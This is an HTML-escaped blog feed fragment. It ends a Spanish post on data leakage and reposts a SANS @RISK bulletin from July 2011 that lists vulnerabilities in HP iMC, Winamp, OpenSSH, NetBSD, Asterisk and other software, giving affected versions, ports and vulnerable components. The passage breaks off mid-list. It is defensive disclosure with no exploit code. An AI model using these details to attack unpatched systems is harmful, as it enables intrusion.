&lt;/div&gt;&lt;div style="line-height: 13.5pt; margin-bottom: .0001pt; margin: 0cm;"&gt;&lt;span style="color: #333333; font-family: Calibri, sans-serif; font-size: 10pt;"&gt;Hace unos días atrás conversaba con el representante de Latinoamérica de una importante fábrica de DLP (Líder en Gartner), y me comentaba que su solución cuando se implementaba en una pequeña parte de la organización, después TODOS quería la herramienta, esto habla que como consultores no estamos haciendo bien nuestro trabajo, y solo andamos mostrando herramientas, pero no realizamos estudios del real impacto que puede tener para una organización financiera, estatal o de cualquier índole, la fuga de información, para luego apoyarnos en las tecnologías disponible.&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5967737507322085400-7921711969714043595?l=pramirezh.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://pramirezh.blogspot.com/2011/07/fuga-de-informacion-tarea-de-todos.html</link><author>noreply@blogger.com (Pablo Ramirez Hoffmann)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-BRrG5UnuvNA/ThdX9DqfruI/AAAAAAAAAKg/KmCRG6mxiK8/s72-c/eset.png" height="72" width="72" /></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5967737507322085400.post-4134867217437980279</guid><pubDate>Fri, 08 Jul 2011 17:46:00 +0000</pubDate><atom:updated>2011-07-08T15:24:34.672-04:00</atom:updated><title>Resumen de Vulnerabilidades - Semana 28</title><description>&lt;div class="mobile-photo"&gt;&lt;/div&gt;&lt;span style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;span class="Apple-style-span" style="color: #333333; font-family: Calibri, sans-serif; line-height: 18px;"&gt;&lt;b&gt;Comentarios:&amp;nbsp;&lt;/b&gt;pramirezh[at]gmail_dot_com&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: 'Courier New'; font-size: 10pt;"&gt;______________________________________________________________________ &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: 'Courier New'; font-size: x-small;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: 'Courier New'; font-size: 10pt;"&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;span lang="EN-US" style="font-family: 'Courier New'; font-size: 10pt;"&gt;@RISK: The Consensus Security Vulnerability Alert&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Week 28 2011&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span lang="EN-US" style="font-family: 'Courier New'; font-size: 10pt;"&gt;______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
Summary of Updates and Vulnerabilities in this Consensus&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class="MsoPlainText" style="margin-bottom: .0001pt; margin: 0cm;"&gt;&lt;span lang="EN-US" style="font-family: 'Courier New'; font-size: 10pt;"&gt;Platform&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Number of Updates and Vulnerabilities&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText" style="margin-bottom: .0001pt; margin: 0cm;"&gt;&lt;span lang="EN-US" style="font-family: 'Courier New'; font-size: 10pt;"&gt;- ------------------------&amp;nbsp;&amp;nbsp; -------------------------------------&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText" style="margin-bottom: .0001pt; margin: 0cm;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoPlainText" style="margin-bottom: .0001pt; margin: 0cm;"&gt;&lt;span lang="EN-US" style="font-family: 'Courier New'; font-size: 10pt;"&gt;Third Party Windows Apps&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 5 (#1)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText" style="margin-bottom: .0001pt; margin: 0cm;"&gt;&lt;span lang="EN-US" style="font-family: 'Courier New'; font-size: 10pt;"&gt;BSD&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 2&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText" style="margin-bottom: .0001pt; margin: 0cm;"&gt;&lt;span lang="EN-US" style="font-family: 'Courier New'; font-size: 10pt;"&gt;Cross Platform&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 12&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText" style="margin-bottom: .0001pt; margin: 0cm;"&gt;&lt;span lang="EN-US" style="font-family: 'Courier New'; font-size: 10pt;"&gt;Web Application - Cross Site Scripting&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 1&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText" style="margin-bottom: .0001pt; margin: 0cm;"&gt;&lt;span lang="EN-US" style="font-family: 'Courier New'; font-size: 10pt;"&gt;Web Application - SQL Injection&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;1&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText" style="margin-bottom: .0001pt; margin: 0cm;"&gt;&lt;span lang="EN-US" style="font-family: 'Courier New'; font-size: 10pt;"&gt;Web Application&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 3&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText" style="margin-bottom: .0001pt; margin: 0cm;"&gt;&lt;span lang="EN-US" style="font-family: 'Courier New'; font-size: 10pt;"&gt;Hardware&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 2&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin-bottom: 12.0pt;"&gt;&lt;span lang="EN-US" style="font-family: 'Courier New'; font-size: 10pt;"&gt;****************************************************************************&lt;br /&gt;
&lt;br /&gt;
Part I -- Critical Vulnerabilities from TippingPoint (&lt;/span&gt;&lt;span style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;a href="http://www.tippingpoint.com/"&gt;&lt;span lang="EN-US"&gt;www.tippingpoint.com&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: 'Courier New'; font-size: 10pt;"&gt;) Widely Deployed Software&lt;br /&gt;
(1) MEDIUM: HP iNode Management Center Stack Buffer Overflow&lt;br /&gt;
&lt;br /&gt;
*************************************************************************&lt;br /&gt;
&lt;br /&gt;
Part II -- Comprehensive List of Newly Discovered Vulnerabilities from Qualys&lt;br /&gt;
(&lt;/span&gt;&lt;span style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;a href="http://www.qualys.com/"&gt;&lt;span lang="EN-US"&gt;www.qualys.com&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: 'Courier New'; font-size: 10pt;"&gt;)&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;-- Third Party Windows Apps&lt;/b&gt;&lt;br /&gt;
11.28.1&amp;nbsp; - Winamp Essentials FLV File Heap-Based Buffer Overflow Vulnerability&lt;br /&gt;
11.28.2&amp;nbsp; - ESTsoft ALZip MIM File Processing Buffer Overflow&lt;br /&gt;
11.28.3&amp;nbsp; - HP Intelligent Management Centre Products Remote Code Execution&lt;br /&gt;
11.28.4&amp;nbsp; - IMesh "IMWebControl.dll" ActiveX Control Buffer Overflow&lt;br /&gt;
11.28.5&amp;nbsp; - XnView DLL Loading Arbitrary Code Execution Vulnerability&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin-bottom: 12.0pt;"&gt;&lt;b&gt;&lt;span lang="EN-US" style="font-family: 'Courier New'; font-size: 10pt;"&gt;-- BSD&lt;br /&gt;
&lt;/span&gt;&lt;/b&gt;&lt;span lang="EN-US" style="font-family: 'Courier New'; font-size: 10pt;"&gt;11.28.6&amp;nbsp; - OpenSSH "pam_thread()" Remote Buffer Overflow Vulnerability&lt;br /&gt;
11.28.7&amp;nbsp; - NetBSD M ultiple 'libc/net' Functions Stack Buffer Overflow Vulnerability&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin-bottom: 12.0pt;"&gt;&lt;b&gt;&lt;span lang="EN-US" style="font-family: 'Courier New'; font-size: 10pt;"&gt;-- Cross Platform&lt;br /&gt;
&lt;/span&gt;&lt;/b&gt;&lt;span lang="EN-US" style="font-family: 'Courier New'; font-size: 10pt;"&gt;11.28.8&amp;nbsp; - Asterisk SIP Authentication Request User Enumeration Weakness&lt;br /&gt;
11.28.9&amp;nbsp; - Sybase Advantage Server "ADS" Process Memory Corruption Vulnerability 11.28.10 - Zope Unspecified Security Bypass Vulnerability&lt;br /&gt;
11.28.11 - Ingate Firewall and SIParator SIP Module Remote Denial of Service Vulnerability&lt;br /&gt;
11.28.12 - Wireshark Lucent/Ascend File Parser Denial of Service&lt;br /&gt;
11.28.13 - SAP Netweaver Insecure SAPTerm User Account Creation Security Bypass Vulnerability&lt;br /&gt;
11.28.14 - IBM DB2 "DT_RPATH" Insecure Library Loading Arbitrary Code Execution Vulnerability&lt;br /&gt;
11.28.15 - Multiple Virtualization Applications Intel VT-d chipsets Local Privilege Escalation Vulnerability&lt;br /&gt;
11.28.16 - IBM InfoSphere Information Server Multiple Local Privilege Escalation Vulnerabilities&lt;br /&gt;
11.28.17 - IBM Tivoli Storage Manager Client Multiple Buffer Overflow&lt;br /&gt;
11.28.18 - Vsftpd Compromised Source Packages Backdoor Vulnerability&lt;br /&gt;
11.28.19 - ISC BIND 9 RPZ Configurations Remote Denial of Service 11.28.20 - Opera Web Browser Multiple Remote Denial of Service Vulnerabilities&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin-bottom: 12.0pt;"&gt;&lt;b&gt;&lt;span lang="EN-US" style="font-family: 'Courier New'; font-size: 10pt;"&gt;-- Web Application - Cross Site Scripting&lt;br /&gt;
&lt;/span&gt;&lt;/b&gt;&lt;span lang="EN-US" style="font-family: 'Courier New'; font-size: 10pt;"&gt;11.28.21 - WebCalendar Multiple Cross-Site Scripting Vulnerabilities&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin-bottom: 12.0pt;"&gt;&lt;b&gt;&lt;span lang="EN-US" style="font-family: 'Courier New'; font-size: 10pt;"&gt;-- Web Application - SQL Injection&lt;br /&gt;
&lt;/span&gt;&lt;/b&gt;&lt;span lang="EN-US" style="font-family: 'Courier New'; font-size: 10pt;"&gt;11.28.22 - PhpFood "restaurant.php" SQL Injection Vulnerability&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b&gt;&lt;span lang="EN-US" style="font-family: 'Courier New'; font-size: 10pt;"&gt;-- Web Application&lt;br /&gt;
&lt;/span&gt;&lt;/b&gt;&lt;span lang="EN-US" style="font-family: 'Courier New'; font-size: 10pt;"&gt;11.28.23 - AeroMail Multiple Vulnerabilities&lt;br /&gt;
11.28.24 - IBM Rational DOORS Multiple Unspecified Vulnerabilities&lt;br /&gt;
11.28.25 - WeBid Local File Include and SQL Injection Vulnerabilities&lt;br /&gt;
&amp;nbsp;-- Hardware&lt;br /&gt;
11.28.26 - Portech MV-372 VoIP Gateway Multiple Security Vulnerabilities &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;span lang="EN-US" style="font-family: 'Courier New'; font-size: 10pt;"&gt;______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;PART I Critical Vulnerabilities&lt;/b&gt;&lt;br /&gt;
Part I for this issue has been compiled by Josh Bronson at TippingPoint, a division of HP, as a by-product of that company's continuous effort to ensure that its intrusion prevention products effectively block exploits using known vulnerabilities. TippingPoint's analysis is complemented by input from a council of security managers from twelve large organizations who confidentially share with SANS the specific actions they have taken to protect their systems. A detailed description of the process may be found at &lt;/span&gt;&lt;span style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;a href="http://www.sans.org/newsletters/risk/#process"&gt;&lt;span lang="EN-US"&gt;http://www.sans.org/newsletters/risk/#process&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;br /&gt;
&lt;br /&gt;
*************************************************************&lt;br /&gt;
&lt;br /&gt;
(1) MEDIUM: HP iNode Management Center Stack Buffer Overflow&lt;br /&gt;
Affected:&lt;br /&gt;
HP Intelligent Management Center User Access Manager (UAM) prior to IMC_UAM_5.0_SP1_E0101P03 HP Intelligent Management Center Endpoint Admission Defense (EAD) prior to IMC_EAD_5.0_SP1_E0101P03&lt;br /&gt;
&lt;br /&gt;
Description: HP has released patches for its Intelligent Management Center network management software. A component of the software, iNOdeMngChecker.exe, listens by default on port 9090 and copies attacker-provided data onto a fixed-length buffer on the stack. By sending a malicious request, an attacker can exploit this vulnerability in order to execute arbitrary code on the target's machine with SYSTEM-level privileges.&lt;br /&gt;
&lt;br /&gt;
Status: vendor confirmed, updates available&lt;br /&gt;
&lt;br /&gt;
References:&lt;br /&gt;
Vendor Site&lt;br /&gt;
&lt;/span&gt;&lt;span style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;a href="http://www.hp.com/"&gt;&lt;span lang="EN-US"&gt;http://www.hp.com&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;br /&gt;
HP Security Bulletin&lt;br /&gt;
&lt;/span&gt;&lt;span style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;a href="http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02901775"&gt;&lt;span lang="EN-US"&gt;http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02901775&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;br /&gt;
Zero Day Initiative Advisory&lt;br /&gt;
&lt;/span&gt;&lt;span style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;a href="http://www.zerodayinitiative.com/advisories/ZDI-11-232/"&gt;&lt;span lang="EN-US"&gt;http://www.zerodayinitiative.com/advisories/ZDI-11-232/&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;br /&gt;
SecurityFocus BugTraq IDs&lt;br /&gt;
&lt;/span&gt;&lt;span style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;a href="http://www.securityfocus.com/bid/48527"&gt;&lt;span lang="EN-US"&gt;http://www.securityfocus.com/bid/48527&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;br /&gt;
&lt;br /&gt;
*************************************************************&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Part II -- Comprehensive List of Newly Discovered Vulnerabilities from Qualys&lt;/b&gt;&lt;br /&gt;
(&lt;/span&gt;&lt;span style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;a href="http://www.qualys.com/"&gt;&lt;span lang="EN-US"&gt;www.qualys.com&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: 'Courier New'; font-size: 10pt;"&gt;)&lt;br /&gt;
&lt;br /&gt;
This list is compiled by Qualys ( &lt;/span&gt;&lt;span style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;a href="http://www.qualys.com/"&gt;&lt;span lang="EN-US"&gt;www.qualys.com&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: 'Courier New'; font-size: 10pt;"&gt; ) as part of that company's ongoing effort to ensure its vulnerability management web service tests for all known vulnerabilities that can be scanned. As of this week Qualys scans for 11590 unique vulnerabilities. For this special SANS community listing, Qualys also includes vulnerabilities that cannot be scanned remotely.&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.28.1 CVE: Not Available&lt;br /&gt;
Platform: Third Party Windows Apps&lt;br /&gt;
Title: Winamp Essentials FLV File Heap-Base d Buffer Overflow Vulnerability&lt;br /&gt;
Description: Winamp Essentials contains plugins for the Winamp media player. The application is exposed to a heap-based buffer overflow issue because it fails to perform adequate boundary checks on user-supplied input. This issue affects the "f263.w5s" file when parsing "CustomWidth" and "CustomHeight" fields. Winamp Essentials 5.6 is vulnerable and other versions may also be affected.&lt;br /&gt;
Ref: &lt;/span&gt;&lt;span style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;a href="http://www.securityfocus.com/bid/48494/info"&gt;&lt;span lang="EN-US"&gt;http://www.securityfocus.com/bid/48494/info&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.28.2 CVE: CVE-2011-1336&lt;br /&gt;
Platform: Third Party Windows Apps&lt;br /&gt;
Title: ESTsoft ALZip MIM File Processing Buffer Overflow&lt;br /&gt;
Description: ESTsoft ALZip is a file compression application. The application is exposed to a buffer overflow issue because it fails to perform adequate boundary checks on user-supplied input. Specifically, this issue occurs when handling specially crafted "MIM" files. ESTsoft ALZip versions 8.21 and prior are affected.&lt;br /&gt;
Ref: &lt;/span&gt;&lt;span style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;a href="http://jvn.jp/en/jp/JVN01547302/index.html"&gt;&lt;span lang="EN-US"&gt;http://jvn.jp/en/jp/JVN01547302/index.html&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.28.3 CVE: CVE-2011-1867&lt;br /&gt;
Platform: Third Party Windows Apps&lt;br /&gt;
Title: HP Intelligent Management Centre Products Remote Code Execution&lt;br /&gt;
Description: HP Intelligent Management Center (formerly 3com&lt;br /&gt;
IMC) is a network management application. HP Intelligent Management Center User Access Manager and Endpoint Admission Defense are exposed to a remote code execution issue because of a stack-based buffer overflow issue. Specifically, the issue effects the "iNOdeMngChecker.exe" component when handling a packet of type "0x0A0BF007". HP Intelligent Management Center User Access Manager&lt;br /&gt;
(UAM) v5.0 (E0101) and prior, HP Intelligent Management Center Endpoint Admission Defense (EAD) v5.0 (E0101) and prior are affected.&lt;br /&gt;
Ref:&lt;br /&gt;
&lt;/span&gt;&lt;span style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;a href="http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02901775"&gt;&lt;span lang="EN-US"&gt;http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02901775&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.28.4 CVE: Not Available&lt;br /&gt;
Platform: Third Party Windows Apps&lt;br /&gt;
Title: IMesh "IMWebControl.dll" ActiveX Control Buffer Overflow&lt;br /&gt;
Description: IMesh is a P2P client for the Microsoft Windows operating platform. The application is exposed to a buffer overflow issue because the application fails to perform adequate boundary checks on user supplied data. This issue affects the "ProcessRequestEx()" method of the "IMWebControl.dll" ActiveX control. This control is identified by CLSID: 7C3B01BC-53A5-48A0-A43B-0C67731134B97. iMesh version 10.0 and the prior are affected.&lt;br /&gt;
Ref: &lt;/span&gt;&lt;span style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;a href="http://packetstormsecurity.org/files/view/102729/imesh-overflow.txt"&gt;&lt;span lang="EN-US"&gt;http://packetstormsecurity.org/files/view/102729/imesh-overflow.txt&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.28.5 CVE: CVE-2011-1338&lt;br /&gt;
Platform: Third Party Windows Apps&lt;br /&gt;
Title: XnView DLL Loading A rbitrary Code Execution Vulnerability&lt;br /&gt;
Description: XnView is an application for managing image files. The application is exposed to an issue that lets attackers execute arbitrary code. The issue arises because the application searches for Dynamic Link Library files in the current working directory. The issue can be exploited by placing both a specially crafted library file and a file that is associated with the vulnerable application in an attacker controlled location. Using the application to open the associated file will cause the malicious library file to be executed.&lt;br /&gt;
XnView versions prior to 1.98.1 are affected.&lt;br /&gt;
Ref: &lt;/span&gt;&lt;span style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;a href="http://www.securityfocus.com/bid/48562/discuss"&gt;&lt;span lang="EN-US"&gt;http://www.securityfocus.com/bid/48562/discuss&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.28.6 CVE: Not Available&lt;br /&gt;
Platform: BSD&lt;br /&gt;
Title: OpenSSH "pam_thread()" Remote Buffer Overflow Vulnerability&lt;br /&gt;
Description: OpenSSH (OpenBSD Secure Shell) is software that provides encrypted communications through the SSH protocol. OpenSSH is exposed to a buffer overflow issue because the library fails to properly perform bounds checks on user supplied input before copying it to an insufficiently sized memory buffer. This issue affects the "pam_thread()" function of the "auth2-pam-freebsd.c" source file.&lt;br /&gt;
OpenSSH 3.5p1 running on FreeBSD 4.9 and 4.11 vulnerable, other versions and platforms may also be affected.&lt;br /&gt;
Ref: &lt;/span&gt;&lt;span style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;a href="http://www.securityfocus.com/bid/48507/info"&gt;&lt;span lang="EN-US"&gt;http://www.securityfocus.com/bid/48507/info&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.28.7 CVE: CVE-2011-1656&lt;br /&gt;
Platform: BSD&lt;br /&gt;
Title: NetBSD Multiple "libc/net" Functions Stack Buffer Overflow Vulnerability&lt;br /&gt;
Description: NetBSD is exposed to a stack-based buffer overflow issue because it fails to properly bounds check user-supplied input.&lt;br /&gt;
Specifically, this issue affects the following functions in the "libc/net" library: "getservbyname()", "getservbyname_r()", "getservbyport()", "getservbyport_r()", "getaddrinfo()" and "getnameinfo()". NetBSD 5.1 is affected.&lt;br /&gt;
Ref: &lt;/span&gt;&lt;span style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;a href="http://www.securityfocus.com/bid/48528/info"&gt;&lt;span lang="EN-US"&gt;http://www.securityfocus.com/bid/48528/info&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.28.8 CVE: CVE-2011-2536&lt;br /&gt;
Platform: Cross Platform&lt;br /&gt;
Title: Asterisk SIP Authentication Request User Enumeration Weakness&lt;br /&gt;
Description: Asterisk is a private branch exchange application available for Linux, BSD and Mac OS X platforms. Asterisk is exposed to a user enumeration weakness. This issue occurs because the application responds differently when enumerating valid and invalid SIP usernames using the SIP authentication requests. Asterisk 1.4.41.2, 1.6.2.18.2, and 1.8.4.4 , Asterisk Business Edition C.3.7.3 are affected.&lt;br /&gt;
Ref: &lt;/span&gt;&lt;span style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;a href="http://downloads.asterisk.org/pub/security/AST-2011-011.html"&gt;&lt;span lang="EN-US"&gt;http://downloads.asterisk.org/pub/security/AST-2011-011.html&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.28.9 CVE: Not Available&lt;br /&gt;
Platform: Cross Platform&lt;br /&gt;
Title: Sybase Advantage Server "ADS" Process Memory Corruption Vulnerability&lt;br /&gt;
Description: Sybase Advantage Server is a relational database management application. The application is exposed to a memory corruption issue.&lt;br /&gt;
This issue affects the "ads.exe" service when handling a malformed packet sent to TCP or UDP port 6262. Sybase Advantage Server 10.0.0.3 is vulnerable and other versions may also be affected.&lt;br /&gt;
Ref: &lt;/span&gt;&lt;span style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;a href="http://aluigi.altervista.org/adv/sybase_4-adv.txt"&gt;&lt;span lang="EN-US"&gt;http://aluigi.altervista.org/adv/sybase_4-adv.txt&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.28.10 CVE: Not Available&lt;br /&gt;
Platform: Cross Platform&lt;br /&gt;
Title: Zope Unspecified Security Bypass Vulnerability&lt;br /&gt;
Description: Zope is a web application server. The application is exposed to an unspecified security bypass issue. Very few technical details are currently available. All versions of Zope and Plone are affected.&lt;br /&gt;
